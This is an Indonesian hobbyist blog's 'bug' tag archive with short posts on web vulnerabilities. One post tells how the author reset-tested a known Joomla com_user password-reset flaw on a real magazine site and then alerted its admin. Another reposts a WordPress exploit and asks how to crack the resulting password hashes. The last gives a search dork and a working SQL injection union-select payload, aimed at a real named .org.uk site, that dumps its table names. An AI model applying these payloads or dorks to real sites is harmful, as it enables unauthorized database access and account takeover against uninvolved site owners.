Tag Archive: bug


Bug in wap.indosat.com

Sudah lamaaaa sekali tidak berkunjung ke  indosat.com dan sub sub domainnya. Tiba-tiba ada berita lomba dari indosat, ya langsung iseng buka wap.indosat.com dan yang saya temukan sama persis dengan dulu ketika terakhir kali saya akses. Bug.

Heran, nggak pernah digagas sepertinya =,=

Tengah malam, ketika saya sedang iseng mencari cara menghubungkan gps dengan laptop, akhirnya saya nyasar di sebuah website media cetak handphone ternama di Indonesia. :loveshy: Awalnya kedatangan saya untuk mencari referensi hape symbian (yang katanya bisa buat gps :hehehe: ). Tidak tahu kenapa, kursor saya nyasar di elemen web yang mengarah ke “com_user”. com_user? hmm, kalau tidak salah setahun yang lalu ada bug di komponen Joomla ini. Iseng saya buka:

hxxp://site.com/index.php?com_user&view=reset&layout=confirm

Hm, halaman web terbuka. Saya ketikkan sebuah karakter sakti di kotak yang tersedia, dan… :what:   Benar-benar sulit dipercaya! Sebuah web media cetak yang pasti semua orang tahu ini, ternyata masih vulner. Dimana dalam vulnerability tersebut kita bisa mereset password admin. Yah, mau bagaimana lagi, gak ada yang 100% safe :itcantbehelp: Tetapi karena ini web lokal tidak saya terusin, langsung kontak admin/redaksi nya :fuh: . Skrinsutnya gan:

Semoga cepat ditanggapi adminnya. Sip :solution:

Maap, nubie hanya bsa repost. Ada bug baru di Joomla, lumayan masih 15 Februari. :ithinkso: dari kak kaMtiEz :hehehe:

Silakan liat di sini

Kalau gagal ada tulisan “Exploit GAGAL GAN” (kaskus banget :itcantbehelp: ). Kalau berhasil akan seperti ini:

Masalahnya…bagaimana kita bisa decrypt password wordpress? Kalau ada yang tahu, share gan… :gimme:

Bug in .org.uk

Langsung to the point:
dork:page.php?id=
site:org.uk

===[ Exploit ]===

www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3

===[ Example ]===

http://server/page.php?id=21&aid=-12′union+select+1,version(),3,4,5,6,7,8– -&s=3

sample

http://www.chect.org.uk/page.php?id=9&aid=-12%27+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database%28%29–%20-&s=3

Follow

Get every new post delivered to your Inbox.